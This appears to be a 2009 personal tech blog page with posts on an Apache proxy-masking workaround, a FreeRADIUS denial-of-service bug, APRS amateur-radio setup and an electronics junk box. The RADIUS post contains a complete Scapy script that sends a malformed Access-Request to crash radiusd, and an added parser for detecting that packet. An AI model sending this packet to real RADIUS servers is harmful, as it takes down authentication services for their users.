DirectorySlash Hacking

The other day I came across the following scenario: A customer wanted to use Apache proxying to hide the virtual hostname that his customers were really pulling content from. The rewrite rule on the “masking host” (which I refer to as www.proxy.net in these examples) is easy enough:

RewriteRule ^/~(.*)$ http://user.proxiedto.net/~$1 [P]

Which works pretty well:

How the mod_rewrite [P] works.

The problem is what happens when DirectorySlash is enabled on the proxied-to host (which it is by default). DirectorySlash fixes incorrectly identified resources; for example, when you request a directory without the trailing forward slash.

GET /~gillespiem/images HTTP/1.1
Host: www.proxy.net

In this instance, you get a 301 redirect that appends a “/” to the end of the request BUT also sets the Location header to the proxied-to virtual hostname. The jig is up, and now the address bar in the browser shows the real host the end-user is speaking to:

When mod_rewrite [P] and DirectorySlash collide.

Here’s a snippet of response from the site:

HTTP/1.1 301 Moved Permanently
Date: Tue, 27 Oct 2009 16:28:27 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://user.proxiedto.net/~gillespiem/images/

I’ve not been able to find an easy way to change what DirectorySlash uses in the Location header (maybe you can’t). DirectorySlash is important, so simply not using it won’t work in this application. Instead, I opted to use a RewriteMap to write my own version, DirectorySlashHack, and enable it in the vhost container (on the proxied-to site) à la:

DirectorySlash off
RewriteMap directoryslashhack        prg:/etc/httpd/maps/directoryslashhack
RewriteRule ^/~([^/]+)(/?.*)         ${directoryslashhack:%1*$1*$2}

While the solution is hack-ish (and the script and RewriteRule could use a small bit of cleanup), it seems to work so far. The perl script determines whether the requested resource is a directory, and if so it issues the appropriate 301 redirect using a customizable Location header (which allows me to force the cleaned-up request back to the proxy).
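The map script itself is not shown in the post, so here is an added example (not the author's perl script) of what a prg: RewriteMap that replaces DirectorySlash can look like. It assumes a key of the form user*path (two fields rather than the three in the rule above), a mod_userdir layout of /home/<user>/public_html, and www.proxy.net as the masking host; isdir is injectable so the decision logic can be tested without a real document tree.

```python
#!/usr/bin/env python3
# Constructed RewriteMap "prg:" helper (added example, not the author's perl
# script): reproduce DirectorySlash's trailing-slash redirect, but with a
# Location that names the masking host rather than the proxied-to host.
import os
import sys

PROXY_HOST = "http://www.proxy.net"          # host the browser should keep seeing
USERDIR_ROOT = "/home/{user}/public_html"    # assumed mod_userdir layout (hypothetical)

def directory_slash_hack(key, root=USERDIR_ROOT, isdir=os.path.isdir):
    """Map a key of the form '<user>*<path>' to the rule's substitution.

    Returns an absolute URL on PROXY_HOST with '/' appended when <path>
    names a directory but lacks the trailing slash; otherwise the unchanged
    /~<user><path>, so mod_rewrite performs a plain internal rewrite.
    'isdir' is injectable so the decision logic can be tested offline.
    """
    user, sep, path = key.partition("*")
    if not sep or not user or "/" in user:
        return "NULL"                        # prg maps report "no match" as NULL
    if path.endswith("/"):
        return "/~%s%s" % (user, path)       # already canonical, nothing to do
    # normpath on an absolute path cannot climb above '/', so '..' in the
    # request can never make the check look outside the user's tree.
    clean = os.path.normpath("/" + path.lstrip("/"))
    if clean == "/":                         # bare /~user
        return "%s/~%s/" % (PROXY_HOST, user)
    if isdir(root.format(user=user) + clean):
        return "%s/~%s%s/" % (PROXY_HOST, user, clean)
    return "/~%s%s" % (user, path)

def main():
    # Apache writes one key per line and expects exactly one reply per line;
    # the reply must be flushed immediately or the server blocks on the map.
    for line in sys.stdin:
        sys.stdout.write(directory_slash_hack(line.rstrip("\n")) + "\n")
        sys.stdout.flush()

if __name__ == "__main__":
    main()
```

mod_rewrite turns an absolute URL substitution into an external redirect on its own (a 302 unless the rule carries R=301), and because the same rule also returns plain paths, a blanket [R=301] flag would redirect every request.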

Freeradius Packet of Death

I haven’t had a chance to use Scapy in a little while, and I hardly spend any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6-capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by software bugs in L2TP sequencing on the Telco router on the other end… their vendor has confirmed the problems).

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet; thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
    print("Usage: radius_killer.py <radiushost>\n")
    sys.exit(1)

# Access-Request (code 1) with a made-up 16-byte authenticator and a single
# type-69 attribute whose length of 2 leaves no room for a value.
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
RadiusAttr(type=69,value="",len=2)

send(PoD)


Interestingly, one doesn’t need a shared key to send the packet of death; as you can tell, the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that doable. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf, so there’s already that level of trust. Correct me if I’m wrong. Either way, updated packages are available.
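On the detection side, the packet above is easy to recognise before it reaches radiusd: RFC 2865 attributes are type/length/value with the length counting all three fields, and every attribute the RFC defines has a length of at least 3. This added example (not from the post) is a small decoder that validates those lengths; the two sample datagrams are constructed inline, the first mirroring the fields of the script above.

```python
#!/usr/bin/env python3
# Constructed example (not from the post): a minimal RFC 2865 RADIUS decoder
# that validates attribute lengths, so the packet built above (Access-Request,
# id 180, a type-69 attribute of length 2 with no value) is flagged in a
# capture or a pre-filter instead of being handed to radiusd unchecked.
import struct

HEADER = struct.Struct("!BBH16s")   # code, identifier, length, authenticator
ACCESS_REQUEST = 1

def parse_radius(datagram):
    """Decode one RADIUS datagram.

    Returns (code, identifier, [(type, value), ...], problems); 'problems'
    is empty for a well-formed packet. Every attribute defined in RFC 2865
    has Length >= 3, so a length of 2 (no value octets) is reported.
    """
    problems = []
    if len(datagram) < HEADER.size:
        return None, None, [], ["datagram shorter than the 20-byte header"]
    code, ident, length, _auth = HEADER.unpack_from(datagram)
    if length != len(datagram):
        problems.append("header length %d != datagram length %d" % (length, len(datagram)))
    attrs, pos, end = [], HEADER.size, min(length, len(datagram))
    while pos < end:
        if pos + 2 > end:
            problems.append("truncated attribute header at offset %d" % pos)
            break
        atype, alen = datagram[pos], datagram[pos + 1]
        if alen < 2 or pos + alen > end:
            problems.append("attribute %d: illegal length %d at offset %d" % (atype, alen, pos))
            break
        if alen == 2:
            problems.append("attribute %d: length 2 leaves no value octets" % atype)
        attrs.append((atype, datagram[pos + 2:pos + alen]))
        pos += alen
    return code, ident, attrs, problems

# Constructed samples. POD mirrors the fields of the script above: code 1,
# id 180, length 22, authenticator of sixteen 0x99 bytes, attribute 69 length 2.
POD = b"\x01\xb4\x00\x16" + b"\x99" * 16 + b"\x45\x02"
# A well-formed Access-Request carrying only User-Name (type 1) = "bob".
OK = b"\x01\x01\x00\x19" + b"\x99" * 16 + b"\x01\x05bob"

if __name__ == "__main__":
    for name, pkt in (("POD", POD), ("OK", OK)):
        code, ident, attrs, problems = parse_radius(pkt)
        print(name, "code=%s id=%s attrs=%d" % (code, ident, len(attrs)), problems or "clean")
```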

RIP Milw0rm

APRS using Xastir

A couple months back, I finally took my Amateur Radio Technician exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copious amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amateur licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

Xastir focused on Central Pennsylvania

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennessee, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe; if you’ve not played it, seriously, get it. I only wish American trains were equipped w/ APRS)

The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

Yaesu-VX7R with a CT-91 cable attached.

With the amateur license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4-tip 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple: two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro; I’ll post my modified schematics shortly… I actually wrote this post months ago).

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)

Happy Birthday: The Great Internet Migratory Box Of Electronics Junk

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself on the list…

Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)